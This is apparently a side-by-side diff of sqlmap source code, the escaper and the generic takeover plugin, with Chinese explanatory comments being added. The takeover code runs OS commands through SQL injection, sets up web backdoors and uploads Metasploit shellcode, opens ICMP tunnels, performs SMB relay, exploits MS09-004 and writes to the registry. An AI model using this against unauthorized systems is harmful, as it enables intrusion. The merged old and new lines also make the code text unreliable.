if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression:
continue Returns:
if re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. '[SLEEPTIME]' marker str: 转义后的表达式
replacement = escaper(original) if not conf.noEscape else original """
retVal = expression # 初始化返回值
if replacement != original: if quote: # 如果需要处理引号
retVal = retVal.replace(item, replacement) for item in re.findall(r"'[^']*'+", expression): # 查找所有单引号包裹的内容
original = item[1:-1] # 获取引号内的原始内容
if original: # 如果原始内容不为空
if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression:
continue # 如果是SQLite数据库且表达式中包含X'...'的格式,则跳过
if re.search(r"$$(SLEEPTIME|RAND)", original) is None: # 检查原始内容是否包含[SLEEPTIME]或[RAND]标记,例如'[SLEEPTIME]'
replacement = escaper(original) if not conf.noEscape else original # 如果配置中没有设置noEscape则使用转义函数进行转义否则不转义
if replacement != original: # 如果转义后的内容与原始内容不同
retVal = retVal.replace(item, replacement) # 则替换表达式中的原始内容为转义后的内容
elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL): elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL):
retVal = retVal.replace("'%s'" % original, "n'%s'" % original) # 如果原始内容的字节长度与字符串长度不同且不是n'...'格式且数据库为MySQLPostgreSQLOracleMSSQL中的一种
else: retVal = retVal.replace("'%s'" % original, "n'%s'" % original) # 则将表达式中的原始内容替换为n'...'格式以支持Unicode字符
retVal = escaper(expression) else: # 如果不需要处理引号
retVal = escaper(expression) # 使用转义函数进行转义
return retVal return retVal # 返回转义后的表达式
@staticmethod @staticmethod
def escape(expression, quote=True): def escape(expression, quote=True):
"""
Generic method to escape a given expression.
通用方法用于转义给定的表达式
Args:
expression (str): The expression to escape. 要转义的表达式
quote (bool, optional): Whether to handle quoting. 是否处理引号默认为True
Raises:
SqlmapUndefinedMethod: 如果没有在具体数据库插件中定义escape方法则抛出此异常
"""
errMsg = "'escape' method must be defined " errMsg = "'escape' method must be defined "
errMsg += "inside the specific DBMS plugin" errMsg += "inside the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法

386
src/sqlmap-master/plugins/generic/takeover.py
Unescape View File

@ -5,234 +5,262 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import os import os # 导入os模块提供与操作系统交互的功能
from lib.core.common import Backend from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.common import getSafeExString from lib.core.common import getSafeExString # 导入getSafeExString函数用于获取安全的异常字符串
from lib.core.common import isDigit from lib.core.common import isDigit # 导入isDigit函数用于判断字符串是否为数字
from lib.core.common import isStackingAvailable from lib.core.common import isStackingAvailable # 导入isStackingAvailable函数用于判断是否支持堆叠查询
from lib.core.common import openFile from lib.core.common import openFile # 导入openFile函数用于安全地打开文件
from lib.core.common import readInput from lib.core.common import readInput # 导入readInput函数用于安全地读取用户输入
from lib.core.common import runningAsAdmin from lib.core.common import runningAsAdmin # 导入runningAsAdmin函数用于判断是否以管理员身份运行
from lib.core.data import conf from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.data import kb from lib.core.data import kb # 导入kb对象存储全局知识库信息
from lib.core.data import logger from lib.core.data import logger # 导入logger对象用于记录日志
from lib.core.enums import DBMS from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.enums import OS from lib.core.enums import OS # 导入OS枚举类定义操作系统类型
from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapFilePathException # 导入SqlmapFilePathException异常类表示文件路径错误
from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence # 导入SqlmapMissingDependence异常类表示缺少依赖
from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException # 导入SqlmapMissingMandatoryOptionException异常类表示缺少必要选项
from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges # 导入SqlmapMissingPrivileges异常类表示缺少权限
from lib.core.exception import SqlmapNotVulnerableException from lib.core.exception import SqlmapNotVulnerableException # 导入SqlmapNotVulnerableException异常类表示目标不漏洞
from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapSystemException # 导入SqlmapSystemException异常类表示系统错误
from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUnsupportedDBMSException # 导入SqlmapUnsupportedDBMSException异常类表示不支持的数据库类型
from lib.takeover.abstraction import Abstraction from lib.takeover.abstraction import Abstraction # 导入Abstraction类用于定义抽象的接管功能
from lib.takeover.icmpsh import ICMPsh from lib.takeover.icmpsh import ICMPsh # 导入ICMPsh类用于定义ICMP隧道功能
from lib.takeover.metasploit import Metasploit from lib.takeover.metasploit import Metasploit # 导入Metasploit类用于定义Metasploit接管功能
from lib.takeover.registry import Registry from lib.takeover.registry import Registry # 导入Registry类用于定义注册表操作功能
class Takeover(Abstraction, Metasploit, ICMPsh, Registry): class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
""" """
This class defines generic OS takeover functionalities for plugins. This class defines generic OS takeover functionalities for plugins.
这个类定义了插件的通用操作系统接管功能
""" """
def __init__(self): def __init__(self):
self.cmdTblName = ("%soutput" % conf.tablePrefix) # 初始化命令输出表名称和字段名称
self.tblField = "data" self.cmdTblName = ("%soutput" % conf.tablePrefix) # 命令输出表名,使用配置中的表前缀
self.tblField = "data" # 表字段名,存储命令输出数据
Abstraction.__init__(self) Abstraction.__init__(self) # 初始化Abstraction基类
def osCmd(self): def osCmd(self):
"""
Executes a single operating system command.
执行单个操作系统命令
"""
# 判断是否可以通过堆叠查询或直接连接执行系统命令
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False # 如果支持堆叠查询或直接连接则不使用Web后门
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command execution" infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg) logger.info(infoMsg)
web = True web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
else: else:
errMsg = "unable to execute operating system commands via " errMsg = "unable to execute operating system commands via "
errMsg += "the back-end DBMS" errMsg += "the back-end DBMS"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常,表示无法通过后端数据库执行系统命令
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
self.initEnv(web=web) self.initEnv(web=web) # 初始化环境
# 如果不使用Web后门或者使用Web后门但URL存在则执行命令
if not web or (web and self.webBackdoorUrl is not None): if not web or (web and self.webBackdoorUrl is not None):
self.runCmd(conf.osCmd) self.runCmd(conf.osCmd) # 执行配置中的系统命令
# 如果不开启操作系统shell或pwn并且没有清理需求则进行清理
if not conf.osShell and not conf.osPwn and not conf.cleanup: if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web) # 清理环境
def osShell(self): def osShell(self):
"""
Prompts for an interactive operating system shell.
提示进行交互式操作系统shell
"""
# 判断是否可以通过堆叠查询或直接连接执行shell
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False # 如果支持堆叠查询或直接连接则不使用Web后门
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL):
infoMsg = "going to use a web backdoor for command prompt" infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg) logger.info(infoMsg)
web = True web = True # 如果不支持堆叠查询且是MySQL数据库则使用Web后门
else: else:
errMsg = "unable to prompt for an interactive operating " errMsg = "unable to prompt for an interactive operating "
errMsg += "system shell via the back-end DBMS because " errMsg += "system shell via the back-end DBMS because "
errMsg += "stacked queries SQL injection is not supported" errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg) # 否则抛出异常表示无法通过后端数据库获取交互式shell
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
try: try:
self.initEnv(web=web) self.initEnv(web=web) # 初始化环境
except SqlmapFilePathException: except SqlmapFilePathException: # 如果初始化环境出现文件路径异常
if not web and not conf.direct: if not web and not conf.direct:
infoMsg = "falling back to web backdoor method..." infoMsg = "falling back to web backdoor method..."
logger.info(infoMsg) logger.info(infoMsg)
web = True web = True # 回退到使用Web后门
kb.udfFail = True kb.udfFail = True # 设置UDF失败标记
self.initEnv(web=web) self.initEnv(web=web) # 重新初始化环境使用Web后门
else: else:
raise raise # 如果不能回退到Web后门则抛出异常
# 如果不使用Web后门或者使用Web后门但URL存在则进入shell
if not web or (web and self.webBackdoorUrl is not None): if not web or (web and self.webBackdoorUrl is not None):
self.shell() self.shell() # 进入shell
# 如果不开启操作系统pwn并且没有清理需求则进行清理
if not conf.osPwn and not conf.cleanup: if not conf.osPwn and not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web) # 清理环境
def osPwn(self): def osPwn(self):
goUdf = False """
fallbackToWeb = False Attempts to gain an out-of-band session via Metasploit or ICMP.
setupSuccess = False 尝试通过Metasploit或ICMP获取带外会话
"""
goUdf = False # 是否使用UDF执行
fallbackToWeb = False # 是否回退到Web后门
setupSuccess = False # 是否设置成功
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库服务器操作系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS): # 如果操作系统是Windows
msg = "how do you want to establish the tunnel?" msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\
msg += "\n[2] ICMP: icmpsh - ICMP tunneling" [1] TCP: Metasploit Framework (default)"
msg += "\
[2] ICMP: icmpsh - ICMP tunneling"
while True: while True:
tunnel = readInput(msg, default='1') tunnel = readInput(msg, default='1') # 读取用户选择的隧道类型
if isDigit(tunnel) and int(tunnel) in (1, 2): if isDigit(tunnel) and int(tunnel) in (1, 2):
tunnel = int(tunnel) tunnel = int(tunnel) # 将用户输入转换为整数
break break
else: else:
warnMsg = "invalid value, valid values are '1' and '2'" warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) logger.warning(warnMsg) # 如果输入无效,则给出警告
else: else:
tunnel = 1 tunnel = 1 # 如果不是Windows系统则默认使用TCP隧道
debugMsg = "the tunnel can be established only via TCP when " debugMsg = "the tunnel can be established only via TCP when "
debugMsg += "the back-end DBMS is not Windows" debugMsg += "the back-end DBMS is not Windows"
logger.debug(debugMsg) logger.debug(debugMsg)
if tunnel == 2: if tunnel == 2: # 如果选择ICMP隧道
isAdmin = runningAsAdmin() isAdmin = runningAsAdmin() # 判断是否以管理员身份运行
if not isAdmin: if not isAdmin:
errMsg = "you need to run sqlmap as an administrator " errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to establish an out-of-band ICMP " errMsg += "if you want to establish an out-of-band ICMP "
errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "tunnel because icmpsh uses raw sockets to "
errMsg += "sniff and craft ICMP packets" errMsg += "sniff and craft ICMP packets"
raise SqlmapMissingPrivileges(errMsg) raise SqlmapMissingPrivileges(errMsg) # 如果不是以管理员身份运行,则抛出异常,表示缺少权限
try: try:
__import__("impacket") __import__("impacket") # 尝试导入impacket库
except ImportError: except ImportError:
errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg = "sqlmap requires 'python-impacket' third-party library "
errMsg += "in order to run icmpsh master. You can get it at " errMsg += "in order to run icmpsh master. You can get it at "
errMsg += "https://github.com/SecureAuthCorp/impacket" errMsg += "https://github.com/SecureAuthCorp/impacket"
raise SqlmapMissingDependence(errMsg) raise SqlmapMissingDependence(errMsg) # 如果缺少impacket库则抛出异常表示缺少依赖
filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" # ICMP回显忽略文件路径
if os.path.exists(filename): if os.path.exists(filename):
try: try:
with openFile(filename, "wb") as f: with openFile(filename, "wb") as f:
f.write("1") f.write("1") # 禁用ICMP回显
except IOError as ex: except IOError as ex:
errMsg = "there has been a file opening/writing error " errMsg = "there has been a file opening/writing error "
errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex))
raise SqlmapSystemException(errMsg) raise SqlmapSystemException(errMsg) # 如果文件打开/写入错误,则抛出异常
else: else:
errMsg = "you need to disable ICMP replies by your machine " errMsg = "you need to disable ICMP replies by your machine "
errMsg += "system-wide. For example run on Linux/Unix:\n" errMsg += "system-wide. For example run on Linux/Unix:\
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" "
errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\
"
errMsg += "If you miss doing that, you will receive " errMsg += "If you miss doing that, you will receive "
errMsg += "information from the database server and it " errMsg += "information from the database server and it "
errMsg += "is unlikely to receive commands sent from you" errMsg += "is unlikely to receive commands sent from you"
logger.error(errMsg) logger.error(errMsg) # 如果文件不存在,给出错误提示
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval") self.sysUdfs.pop("sys_bineval") # 如果是MySQL或PostgreSQL移除sys_bineval UDF
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
# 判断是否可以通过堆叠查询或直接连接执行
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False # 如果支持堆叠查询或直接连接则不使用Web后门
self.initEnv(web=web) self.initEnv(web=web) # 初始化环境
if tunnel == 1: if tunnel == 1: # 如果选择TCP隧道
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): # 如果是MySQL或PostgreSQL
msg = "how do you want to execute the Metasploit shellcode " msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?" msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\
msg += "\n[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)" [1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\
[2] Via 'shellcodeexec' (file system way, preferred on 64-bit systems)"
while True: while True:
choice = readInput(msg, default='1') choice = readInput(msg, default='1') # 读取用户选择的执行方式
if isDigit(choice) and int(choice) in (1, 2): if isDigit(choice) and int(choice) in (1, 2):
choice = int(choice) choice = int(choice) # 将用户输入转换为整数
break break
else: else:
warnMsg = "invalid value, valid values are '1' and '2'" warnMsg = "invalid value, valid values are '1' and '2'"
logger.warning(warnMsg) logger.warning(warnMsg) # 如果输入无效,则给出警告
if choice == 1: if choice == 1:
goUdf = True goUdf = True # 如果选择使用UDF则设置标记
if goUdf: if goUdf:
exitfunc = "thread" exitfunc = "thread" # 如果使用UDF则设置退出函数为线程
setupSuccess = True setupSuccess = True # 设置成功
else: else:
exitfunc = "process" exitfunc = "process" # 如果不使用UDF则设置退出函数为进程
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
if not goUdf: if not goUdf:
setupSuccess = self.uploadShellcodeexec(web=web) setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
if setupSuccess is not True: if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
else: else:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc: if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate" debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg) logger.debug(debugMsg) # 如果是Windows上的MySQL且开启了提权给出调试信息
elif tunnel == 2: elif tunnel == 2: # 如果选择ICMP隧道
setupSuccess = self.uploadIcmpshSlave(web=web) setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
if setupSuccess is not True: if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True fallbackToWeb = True # 如果上传失败且是MySQL数据库则回退到Web后门
else: else:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 否则抛出异常,表示无法执行操作系统接管
# 如果设置不成功且是MySQL数据库且不是直接连接且不支持堆叠查询或回退到Web后门则使用Web后门
if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):
web = True web = True # 设置使用Web后门
if fallbackToWeb: if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel" infoMsg = "falling back to web backdoor to establish the tunnel"
@ -240,242 +268,270 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry):
infoMsg = "going to use a web backdoor to establish the tunnel" infoMsg = "going to use a web backdoor to establish the tunnel"
logger.info(infoMsg) logger.info(infoMsg)
self.initEnv(web=web, forceInit=fallbackToWeb) self.initEnv(web=web, forceInit=fallbackToWeb) # 初始化环境,强制初始化
if self.webBackdoorUrl: if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc: if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
# Unset --priv-esc if the back-end DBMS underlying operating # Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows # system is not Windows
conf.privEsc = False conf.privEsc = False # 如果不是Windows系统且开启了提权则关闭提权
warnMsg = "sqlmap does not implement any operating system " warnMsg = "sqlmap does not implement any operating system "
warnMsg += "user privilege escalation technique when the " warnMsg += "user privilege escalation technique when the "
warnMsg += "back-end DBMS underlying system is not Windows" warnMsg += "back-end DBMS underlying system is not Windows"
logger.warning(warnMsg) logger.warning(warnMsg) # 给出警告
if tunnel == 1: if tunnel == 1:
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") # 创建Metasploit shellcode
setupSuccess = self.uploadShellcodeexec(web=web) setupSuccess = self.uploadShellcodeexec(web=web) # 上传shellcodeexec程序
if setupSuccess is not True: if setupSuccess is not True:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
elif tunnel == 2: elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web) setupSuccess = self.uploadIcmpshSlave(web=web) # 上传icmpsh slave程序
if setupSuccess is not True: if setupSuccess is not True:
msg = "unable to mount the operating system takeover" msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg) raise SqlmapFilePathException(msg) # 如果上传失败,则抛出异常
if setupSuccess: if setupSuccess:
if tunnel == 1: if tunnel == 1:
self.pwn(goUdf) self.pwn(goUdf) # 如果是TCP隧道则执行pwn
elif tunnel == 2: elif tunnel == 2:
self.icmpPwn() self.icmpPwn() # 如果是ICMP隧道则执行icmpPwn
else: else:
errMsg = "unable to prompt for an out-of-band session" errMsg = "unable to prompt for an out-of-band session"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg) # 如果设置失败,则抛出异常
if not conf.cleanup: if not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web) # 如果没有清理需求,则进行清理
def osSmb(self): def osSmb(self):
self.checkDbmsOs() """
Performs a SMB relay attack.
执行SMB中继攻击
"""
self.checkDbmsOs() # 检查数据库服务器操作系统
if not Backend.isOs(OS.WINDOWS): if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is " errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows: it is not possible to perform the SMB " errMsg += "not Windows: it is not possible to perform the SMB "
errMsg += "relay attack" errMsg += "relay attack"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常表示不支持SMB中继攻击
if not isStackingAvailable() and not conf.direct: if not isStackingAvailable() and not conf.direct:
if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL):
errMsg = "on this back-end DBMS it is only possible to " errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked " errMsg += "perform the SMB relay attack if stacked "
errMsg += "queries are supported" errMsg += "queries are supported"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果是PostgreSQL或MSSQL且不支持堆叠查询则抛出异常
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "since stacked queries are not supported, " debugMsg = "since stacked queries are not supported, "
debugMsg += "sqlmap is going to perform the SMB relay " debugMsg += "sqlmap is going to perform the SMB relay "
debugMsg += "attack via inference blind SQL injection" debugMsg += "attack via inference blind SQL injection"
logger.debug(debugMsg) logger.debug(debugMsg) # 如果是MySQL且不支持堆叠查询则使用盲注进行SMB中继攻击
printWarn = True printWarn = True # 是否打印警告
warnMsg = "it is unlikely that this attack will be successful " warnMsg = "it is unlikely that this attack will be successful "
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
warnMsg += "because by default MySQL on Windows runs as " warnMsg += "because by default MySQL on Windows runs as "
warnMsg += "Local System which is not a real user, it does " warnMsg += "Local System which is not a real user, it does "
warnMsg += "not send the NTLM session hash when connecting to " warnMsg += "not send the NTLM session hash when connecting to "
warnMsg += "a SMB service" warnMsg += "a SMB service" # 如果是MySQL给出警告
elif Backend.isDbms(DBMS.PGSQL): elif Backend.isDbms(DBMS.PGSQL):
warnMsg += "because by default PostgreSQL on Windows runs " warnMsg += "because by default PostgreSQL on Windows runs "
warnMsg += "as postgres user which is a real user of the " warnMsg += "as postgres user which is a real user of the "
warnMsg += "system, but not within the Administrators group" warnMsg += "system, but not within the Administrators group" # 如果是PostgreSQL给出警告
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion() warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
warnMsg += "runs as Network Service which is not a real user, " warnMsg += "runs as Network Service which is not a real user, "
warnMsg += "it does not send the NTLM session hash when " warnMsg += "it does not send the NTLM session hash when "
warnMsg += "connecting to a SMB service" warnMsg += "connecting to a SMB service" # 如果是MSSQL给出警告
else: else:
printWarn = False printWarn = False # 如果不是上述情况,则不打印警告
if printWarn: if printWarn:
logger.warning(warnMsg) logger.warning(warnMsg) # 打印警告信息
self.smb() self.smb() # 执行SMB中继攻击
def osBof(self): def osBof(self):
"""
Exploits a buffer overflow vulnerability in the 'sp_replwritetovarbin' stored procedure (MS09-004)
利用 'sp_replwritetovarbin' 存储过程中的缓冲区溢出漏洞 (MS09-004)
"""
if not isStackingAvailable() and not conf.direct: if not isStackingAvailable() and not conf.direct:
return return # 如果不支持堆叠查询或不是直接连接,则返回
if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")):
errMsg = "the back-end DBMS must be Microsoft SQL Server " errMsg = "the back-end DBMS must be Microsoft SQL Server "
errMsg += "2000 or 2005 to be able to exploit the heap-based " errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' " errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)" errMsg += "stored procedure (MS09-004)"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是MSSQL 2000或2005则抛出异常表示不支持此漏洞
infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
infoMsg += "buffer overflow (MS09-004)" infoMsg += "buffer overflow (MS09-004)"
logger.info(infoMsg) logger.info(infoMsg) # 打印漏洞利用信息
msg = "this technique is likely to DoS the DBMS process, are you " msg = "this technique is likely to DoS the DBMS process, are you "
msg += "sure that you want to carry with the exploit? [y/N] " msg += "sure that you want to carry with the exploit? [y/N] " # 提示是否继续
if readInput(msg, default='N', boolean=True): if readInput(msg, default='N', boolean=True):
self.initEnv(mandatory=False, detailed=True) self.initEnv(mandatory=False, detailed=True) # 初始化环境,不强制,但详细
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) # 创建Metasploit shellcode使用SEH退出函数
self.bof() self.bof() # 执行缓冲区溢出攻击
def uncPathRequest(self): def uncPathRequest(self):
"""
Initiates a UNC path request.
发起UNC路径请求
"""
errMsg = "'uncPathRequest' method must be defined " errMsg = "'uncPathRequest' method must be defined "
errMsg += "into the specific DBMS plugin" errMsg += "into the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法
def _regInit(self): def _regInit(self):
"""
Initializes registry operation.
初始化注册表操作
"""
if not isStackingAvailable() and not conf.direct: if not isStackingAvailable() and not conf.direct:
return return # 如果不支持堆叠查询或不是直接连接,则返回
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库服务器操作系统
if not Backend.isOs(OS.WINDOWS): if not Backend.isOs(OS.WINDOWS):
errMsg = "the back-end DBMS underlying operating system is " errMsg = "the back-end DBMS underlying operating system is "
errMsg += "not Windows" errMsg += "not Windows"
raise SqlmapUnsupportedDBMSException(errMsg) raise SqlmapUnsupportedDBMSException(errMsg) # 如果不是Windows系统则抛出异常
self.initEnv() self.initEnv() # 初始化环境
self.getRemoteTempPath() self.getRemoteTempPath() # 获取远程临时路径
def regRead(self): def regRead(self):
self._regInit() """
Reads a value from the Windows registry.
读取Windows注册表中的值
"""
self._regInit() # 初始化注册表操作
if not conf.regKey: if not conf.regKey:
default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
msg = "which registry key do you want to read? [%s] " % default msg = "which registry key do you want to read? [%s] " % default
regKey = readInput(msg, default=default) regKey = readInput(msg, default=default) # 读取用户输入的注册表键,默认使用指定路径
else: else:
regKey = conf.regKey regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal: if not conf.regVal:
default = "ProductName" default = "ProductName"
msg = "which registry key value do you want to read? [%s] " % default msg = "which registry key value do you want to read? [%s] " % default
regVal = readInput(msg, default=default) regVal = readInput(msg, default=default) # 读取用户输入的注册表值默认使用ProductName
else: else:
regVal = conf.regVal regVal = conf.regVal # 如果配置中指定了注册表值,则使用配置
infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal)
logger.info(infoMsg) logger.info(infoMsg) # 打印读取注册表路径信息
return self.readRegKey(regKey, regVal, True) return self.readRegKey(regKey, regVal, True) # 读取注册表键值,并返回结果
def regAdd(self): def regAdd(self):
self._regInit() """
Adds a value to the Windows registry.
向Windows注册表添加值
"""
self._regInit() # 初始化注册表操作
errMsg = "missing mandatory option" errMsg = "missing mandatory option" # 缺少必要参数的错误信息
if not conf.regKey: if not conf.regKey:
msg = "which registry key do you want to write? " msg = "which registry key do you want to write? "
regKey = readInput(msg) regKey = readInput(msg) # 读取用户输入的注册表键
if not regKey: if not regKey:
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg) # 如果没有输入,则抛出缺少必要选项异常
else: else:
regKey = conf.regKey regKey = conf.regKey # 如果配置中指定了注册表键,则使用配置
if not conf.regVal: if not conf.regVal:
msg = "which registry key value do you want to write? " msg = "which registry key value do you want to write? "
regVal = readInput(msg) regVal = readInput(msg) # 读取用户输入的注册表值
